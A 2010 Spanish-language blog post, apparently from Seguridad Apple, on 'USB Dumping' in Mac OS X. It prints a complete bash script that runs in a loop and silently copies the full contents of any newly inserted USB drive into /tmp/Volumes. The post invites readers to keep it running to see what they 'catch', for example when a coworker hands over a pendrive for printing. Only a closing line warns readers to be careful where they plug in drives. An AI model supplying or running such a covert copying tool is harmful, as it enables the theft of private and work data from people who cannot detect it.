jueves, 28 de octubre de 2010

Copiar el contenido de un pendrive de forma oculta en Mac OS X (USB Dumping)


Una de las técnicas de robo de información de forma local es la llamada ‘USB Dumping’. Ésta técnica consiste en realizar un copiado de la información de cualquier dispositivo USB que se conecte a nuestro equipo, de forma totalmente transparente al usuario.

Éste tipo de ataques puede resultar útil en entornos de trabajo en los cuales un compañero te pide la impresión de un documento, y para ello te proporciona un pendrive en el cual está el documento a imprimir junto con un montón de datos que el usuario, descuidadamente, mantiene en el mismo dispositivo.

De este modo, al conectar el dispositivo USB para la impresión del documento, se estará produciendo un copiado al completo del contenido del disco y, aunque el propietario del pendrive esté atento a las acciones realizadas sobre el mismo, le será imposible detectar que se ha realizado una copia de toda su información.

Desde Seguridad Apple hemos desarrollado un pequeño script que realiza esta tarea y que puedes tener corriendo siempre en tu sistema Mac OS X para ver que "cazas". Normalmente la gente suele mezclar en sus pendrives personales documentos de trabajo, datos de intercambio y cosas de alto nivel de intimidad. El código es el siguiente:


#!/bin/bash
#www.seguridadapple.com
function saveDefaultDevices()
{
rm -rf /tmp/usblist /tmp/Volumes
mkdir /tmp/Volumes
for vol in /Volumes/*
do
echo $vol >> /tmp/usblist
echo "Detecting $vol as default"
done
}
function checkDevices()
{
for vol in /Volumes/*
do
aux=`cat /tmp/usblist |grep -i "$vol"`
aux=`echo $?`
if [ $aux -eq 1 ]; then
echo $vol >> /tmp/usblist
mkdir "/tmp$vol"
echo "[+] Dumping $vol in /tmp$vol"
sleep 1
cp -R "$vol" "/tmp/Volumes/"
echo "[+] Done"
fi
done
}
saveDefaultDevices
while [ 1 ]; do
checkDevices
sleep 1
done


El funcionamiento del script es muy sencillo. Únicamente es necesario ejecutarlo mediante el comando ‘sh usb.sh’, y esperar a que se introduzca un nuevo dispositivo USB. Será en este momento en el cual el script detectará su presencia y comenzará a realizar su volcado en el directorio "/tmp/Volumes/".


Como se ve en las capturas de pantalla, tras realizarse el volcado de “/Volumes/Untitled”, se puede acceder a su contenido copiado en ”/tmp/Volumes/Untitled/


Ten mucho cuidado donde pinchas un pendrive ya que el peligro no es sólo que se infecte, sino que te roben todos los datos que en él tengas sin que te des cuenta.

No hay comentarios: